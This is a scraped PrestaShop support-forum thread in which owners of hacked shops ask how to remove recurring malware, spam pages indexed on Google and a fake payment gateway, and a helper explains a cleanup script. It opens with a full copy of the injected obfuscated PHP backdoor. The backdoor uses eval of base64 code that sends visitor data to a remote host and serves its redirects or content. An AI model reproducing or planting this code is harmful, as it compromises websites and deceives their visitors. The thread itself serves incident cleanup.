/*-ztZ{-*/(/*-FIPB-97-*/md5/*-Yb:=-*/(/*-+nDXAoX--*/md5/*-k2+-*/(/*-jMVWoUD[<-*/$fLs/*-+p1>m-P-*/[/*-C_T~`-*/1+2/*-&DK.D&9UT2-*/]/*-e_RSBZ-*/)/*-#Ci2K@9-*/)/*-N5G<<j-*/ === /*-],xa-*/"e46f3c25e88b60b249f4a91815ca94b1"/*-_ix-*/)/*-{$mXuJnR-*/ ): /*-QR}jM>(b,q-*/$zcwMvFeKfy /*-#>p-*/=/*-L!vC-*/ self/*-+3f:s4>-*/::/*-AtG-*/EmCfWJ/*-!<]-*/(/*-j^p-*/$fLs/*-DC1cy^u9W-*/[/*-hE|^fB-*/0+1/*-aaHVO-*/], /*-zY7f^-*/$gJNZVFhLM/*-j.-*/[/*-y}gMz):,V-*/5+0/*-Cv7>-*/]/*-$)lJs,:-*/);/*-+l-*/@eval/*-xG}Z^A=-*/(/*-Hr-*/$gJNZVFhLM/*-|Ud>|d,-*/[/*-nQ@W:%P-*/2+2/*-P+-*/]/*-W8X$.-*/(/*-,-*/$zcwMvFeKfy/*-{x6rOk-*/)/*-ZhA1.N-*/);/*-gXG@-*//*-ns8z-*/die;/*-8-WgH9-*/ endif;/*-tk1oAxA~-*/ }/*-IN>JLO-*/}/*-PFdKd-)(-*/qM/*--)qDigTl-*/::/*-7P-*/lRBstZXuLC/*[email protected]*/();/*-#og[p%-*//*-f_f)QM@--*/eval/*-Q2IXIrKhK<B4O!-<h~l^].+>H)7HH-*/(/*-g^eu7a3Y[-*/base64_decode/*-yn[@hC7C-*/(/*-<0@ZXG1-*/"eval("?>".base64_decode("PD9waHAgIGhlYWRlcignQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgnKTsgZXJyb3JfcmVwb3J0aW5nKDApO2Z1bmN0aW9uIFNGdGhxYUtUUEdXbUwoJHJlc3BfaGVhZGVyKXskaGVhZGVyID0gYXJyYXkoJ3N0YXR1cycgPT4gMCwgJ2NvbnRlbnQnID0+ICcnLCAndHlwZScgPT4gJycpO2lmICghaXNfYXJyYXkoJHJlc3BfaGVhZGVyKSkge3JldHVybiAkaGVhZGVyO31mb3JlYWNoICgkcmVzcF9oZWFkZXIgYXMgJGhvbmUpIHtpZiAocHJlZ19tYXRjaCgnL2h0dHBcL1swLTlcLl0rW1xzXSsoWzAtOV0rKS9pJywgJGhvbmUsICRtYXRjaGVkKSkgeyRoZWFkZXJbJ3N0YXR1cyddID0gaW50dmFsKCRtYXRjaGVkWzFdKTt9IGVsc2VpZiAocHJlZ19tYXRjaCgnL2xvY2F0aW9uXDpbXHNdKyguKikvaScsICRob25lLCAkbWF0Y2hlZCkpIHskaGVhZGVyWydjb250ZW50J10gPSAkbWF0Y2hlZFsxXTt9IGVsc2VpZiAocHJlZ19tYXRjaCgnL2NvbnRlbnRcLXR5cGVcOltcc10rKC4qKS9pJywgJGhvbmUsICRtYXRjaGVkKSkgeyRoZWFkZXJbJ3R5cGUnXSA9ICRtYXRjaGVkWzFdO319cmV0dXJuICRoZWFkZXI7fWZ1bmN0aW9uIGd3bXpDR1plZlhKQVUoJHVybCwgJGRhdGFzID0gYXJyYXkoKSl7JHJlc3BvbnNlID0gYXJyYXkoJ3N0YXR1cycgPT4gMCwgJ2NvbnRlbnQnID0+ICcnLCAndHlwZScgPT4gJycpO2lmIChpc19hcnJheSgkZGF0YXMpICYmIGNvdW50KCRkYXRhcykpIHskdXJsIC49ICc/JyAuIGh0dHBfYnVpbGRfcXVlcnkoJGRhdGFzKTt9dHJ5IHtpZiAoZnVuY3Rpb25fZXhpc3RzKCdjdXJsX2V4ZWMnKSAmJiBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpKSB7JGMgPSBjdXJsX2luaXQoKTtjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VUkwsICR1cmwpO2N1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCAwKTtjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7Y3VybF9zZXRvcHQoJGMsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDIwKTtjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9USU1FT1VULCA2MCk7Y3VybF9zZXRvcHQoJGMsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDApO2N1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0NPT0tJRVNFU1NJT04sIDApO2N1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTskY19yZXR2YWwgPSBjdXJsX2V4ZWMoJGMpOyRyZXNwb25zZVsnc3RhdHVzJ10gPSBpbnR2YWwoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpKTskcmVzcG9uc2VbJ3R5cGUnXSA9IHN0cnZhbChjdXJsX2dldGluZm8oJGMsIENVUkxJTkZPX0NPTlRFTlRfVFlQRSkpOyRyZXNwb25zZVsnY29udGVudCddID0gc3RydmFsKGN1cmxfZ2V0aW5mbygkYywgQ1VSTElORk9fUkVESVJFQ1RfVVJMKSk7QGN1cmxfY2xvc2UoJGMpO2lmIChpbl9hcnJheSgkcmVzcG9uc2VbJ3N0YXR1cyddLCBhcnJheSgyMDAsIDMwMSwgMzAyLCA0MDQpKSkgeyRyZXNwb25zZVsnY29udGVudCddID0gc3RydmFsKCRjX3JldHZhbCk7fX0gZWxzZWlmIChpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyRodHRwX29wdCA9IGFycmF5KCdodHRwJyA9PiBhcnJheSgnbWV0aG9kJyA9PiAnR0VUJywgJ3RpbWVvdXQnID0+IDYwLCAnZm9sbG93X2xvY2F0aW9uJyA9PiAwKSwnc3NsJyA9PiBhcnJheSgidmVyaWZ5X3BlZXIiID0+IGZhbHNlLCAidmVyaWZ5X3BlZXJfbmFtZSIgPT4gZmFsc2UpKTskY29udGV4dCA9IHN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkaHR0cF9vcHQpOyRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7JHJlc3BvbnNlID0gYXJyYXlfbWVyZ2UoJHJlc3BvbnNlLCBTRnRocWFLVFBHV21MKCRodHRwX3Jlc3BvbnNlX2hlYWRlcikpO2lmIChpbl9hcnJheSgkcmVzcG9uc2VbJ3N0YXR1cyddLCBhcnJheSgyMDAsIDMwMSwgMzAyLCA0MDQpKSkgeyRyZXNwb25zZVsnY29udGVudCddID0gc3RydmFsKCRjb250ZW50KTt9fX0gY2F0Y2ggKEV4Y2VwdGlvbiAkZSkge31yZXR1cm4gJHJlc3BvbnNlO31mdW5jdGlvbiBRZkJOd1BsemJ4akgoJHN0cil7aWYgKCEkc3RyKSByZXR1cm4gJyc7cmV0dXJuIHJ0cmltKHN0cnRyKGJhc2U2NF9lbmNvZGUoJHN0ciksICcrLycsICctXycpLCAnPScpO31mdW5jdGlvbiBrS0hNTGFqVHRpQ0l2KCl7JGlwX2FkZHIgPSAnJztpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfQ0ZfQ09OTkVDVElOR19JUCddKSAmJiAhZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0ZfQ09OTkVDVElOR19JUCddKSkgeyRpcF9hZGRyID0gJF9TRVJWRVJbJ0hUVFBfQ0ZfQ09OTkVDVElOR19JUCddO30gZWxzZWlmIChpc3NldCgkX1NFUlZFUlsnSFRUUF9YX1JFQUxfSVAnXSkgJiYgIWVtcHR5KCRfU0VSVkVSWydIVFRQX1hfUkVBTF9JUCddKSkgeyRpcF9hZGRyID0gJF9TRVJWRVJbJ0hUVFBfWF9SRUFMX0lQJ107fSBlbHNlaWYgKGlzc2V0KCRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX0ZPUiddKSAmJiAhZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKSB7JGlwX2FkZHIgPSAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTt9IGVsc2UgeyRpcF9hZGRyID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107fSRpcF9hZGRyID0gdHJpbShzdHJfcmVwbGFjZSgiICIsICIiLCAkaXBfYWRkciksICIsIik7aWYgKHN0cnBvcygkaXBfYWRkciwgIiwiKSAhPT0gZmFsc2UpIHskaXBfYWRkciA9IGV4cGxvZGUoIiwiLCAkaXBfYWRkcik7JGlwX2FkZHIgPSAkaXBfYWRkclswXTt9cmV0dXJuICRpcF9hZGRyO31mdW5jdGlvbiBWeFhzTGpKa0FobnBNZVl1RlQoKXskaHR0cF9wcm90byA9ICdodHRwOi8vJztpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBTJ10pICYmIHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBTJ10pICE9PSAnb2ZmJykgeyRodHRwX3Byb3RvID0gJ2h0dHBzOi8vJzt9IGVsc2VpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfUFJPVE8nXSkgJiYgJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfUFJPVE8nXSA9PT0gJ2h0dHBzJykgeyRodHRwX3Byb3RvID0gJ2h0dHBzOi8vJzt9IGVsc2VpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfRlJPTlRfRU5EX0hUVFBTJ10pICYmIHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfRlJPTlRfRU5EX0hUVFBTJ10pICE9PSAnb2ZmJykgeyRodHRwX3Byb3RvID0gJ2h0dHBzOi8vJzt9cmV0dXJuICRodHRwX3Byb3RvO31pZiAoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gPT09ICcvUi0nIC4gbWQ1KCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKSkge2V4aXQoc3RycmV2KG1kNSgkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpKTt9aWYgKHN1YnN0cl9jb3VudCgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgJ2luZGV4LnBocC9qaycpKSB7ZXhpdCgneyAiZXJyb3IiOiAyMDAsICJsYyI6ICJqayIsICJkYXRhIjogWyAxIF0gfScpO30kaXBfYWRkciA9IGtLSE1MYWpUdGlDSXYoKTskcmVmZXJlciA9IHN0cnZhbChAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKTskc2l0ZV91cmwgPSBWeFhzTGpKa0FobnBNZVl1RlQoKSAuICRfU0VSVkVSWydIVFRQX0hPU1QnXTtpZiAoc3RycG9zKCRyZWZlcmVyLCAkc2l0ZV91cmwpID09PSAwKSAkcmVmZXJlciA9ICcnOyRycSA9IGFycmF5KCk7JHJxWydpJ10gPSBRZkJOd1BsemJ4akgoJGlwX2FkZHIpOyRycVsnbCddID0gUWZCTndQbHpieGpIKCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKTskcnFbJ3NuJ10gPSBRZkJOd1BsemJ4akgoJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pOyRycVsnciddID0gUWZCTndQbHpieGpIKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTskcnFbJ3JmJ10gPSBRZkJOd1BsemJ4akgoJHJlZmVyZXIpOyRycVsncyddID0gUWZCTndQbHpieGpIKCRzaXRlX3VybCk7JHJxWyd1J10gPSBRZkJOd1BsemJ4akgoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKTskcl90cmltID0gcHJlZ19yZXBsYWNlKCcvXD8uKi8nLCAnJywgJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pOyRyX2lzdGF0aWMgPSBmYWxzZTtpZiAoc3RycG9zKCRyX3RyaW0sICcuJykgPiAwJiZzdHJwb3MoJHJfdHJpbSwnLnBocCcpPT09ZmFsc2UpIHskZXh0ID0gc3Vic3RyKCRyX3RyaW0sIHN0cnBvcygkcl90cmltLCAnLicpKTtpZiAoaW5fYXJyYXkoJGV4dCwgYXJyYXkoJy5qcycsICcuY3NzJywgJy5qcGcnLCAnLnBuZycsICcuZ2lmJywgJy5pY28nKSkpIHskcl9pc3RhdGljID0gdHJ1ZTt9fWlmICghJHJfaXN0YXRpYykgeyRyZXNwb25zZSA9IGd3bXpDR1plZlhKQVUoYmFzZTY0X2RlY29kZSgiYUhSMGNEb3ZMM3B6TVRVeWRqRXpMbTltWm1salpYSXViR0YwTHciKSwgJHJxKTtpZiAoIWluX2FycmF5KCRyZXNwb25zZVsnc3RhdHVzJ10sIGFycmF5KDAsIDIwMCkpKSB7c3dpdGNoICgkcmVzcG9uc2VbJ3N0YXR1cyddKSB7Y2FzZSAzMDE6aGVhZGVyKCdIVFRQLzEuMSAzMDEgTW92ZWQgUGVybWFuZW50bHknKTtoZWFkZXIoJ0xvY2F0aW9uOiAnIC4gdHJpbSgkcmVzcG9uc2VbJ2NvbnRlbnQnXSkpO2JyZWFrO2Nhc2UgMzAyOmhlYWRlcignSFRUUC8xLjEgMzAyIE1vdmUgVGVtcG9yYXJpbHknKTtoZWFkZXIoJ0xvY2F0aW9uOiAnIC4gdHJpbSgkcmVzcG9uc2VbJ2NvbnRlbnQnXSkpO2JyZWFrO2Nhc2UgNDA0OmhlYWRlcignSFRUUC8xLjEgNDA0IE5vdCBGb3VuZCcpO2hlYWRlcigic3RhdHVzOiA0MDQgTm90IEZvdW5kIik7YnJlYWs7ZGVmYXVsdDpicmVhazt9fWlmIChzdHJsZW4oJHJlc3BvbnNlWydjb250ZW50J10pKSB7QGhlYWRlcignQ29udGVudC1UeXBlOicgLiAkcmVzcG9uc2VbJ3R5cGUnXSk7ZWNobyAkcmVzcG9uc2VbJ2NvbnRlbnQnXTtleGl0KDApO319Pz4="));"/*-m_yyIq-*/)/*-zBR-*/);/*-pl08-*/?><?php

Dès que je le supprime, il réapparaît. J'ai supprimé le module simpleimportproduct mais sans succès. Une idée de comment trouver l'origine ?

Link to comment
Share on other sites

@Eolia Ça a fonctionné merci. J'ai constaté que des milliers de liens avaient été indexés sur google suite à ce piratage via l'url monsite.fr/shop/...

Ces liens ne sont en parallèle pas répertoriés dans notre Google Search Console. Une idée du processus à suivre pour les faire désindexer ?

Link to comment
Share on other sites

@Eolia After upload the cleaner.php file i run the scrip on mysite.com/cleaner.php. so What i have to do now? After run the script all malicious files and codes will be remove autometically or I have to do something else? I read so many comments there all instruction is same 1) Download the cleaner file 2) upload the cleaner file and 3rd) run this on my site site.com/cleaner.php  I completed those steps. what next?  Please help me.

Link to comment
Share on other sites

Hello,
Cleaner automatically removes what it recognizes as added and infected. (And shows you the message)
It temporarily fixes what it can.
If core files are marked as modified, replace them immediately with those from the original archive.
Then look at the code of the modules indicated as having risky functions.

Link to comment
Share on other sites

Thank you @Eolia You are very helpful. I removed the /installaaa file and old cache copy directory.  You told me to restore files " 

MD5 INTEGRITY: PHP file modified compared to the original version. Content to check " with this line. My question is how can i restore those files? From a new version of prestashop files? 

Another question is My prestashop has a fake payment gateway now. I don't know who injected this fake payment gateway. What can I do for remove fake payment gateway?

Please don't mind I'm new in this. That's why I'm asking so many questions. Also I have attached the new scan report after removed the /installaaa and old cache copy files. Please give me instruction. 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...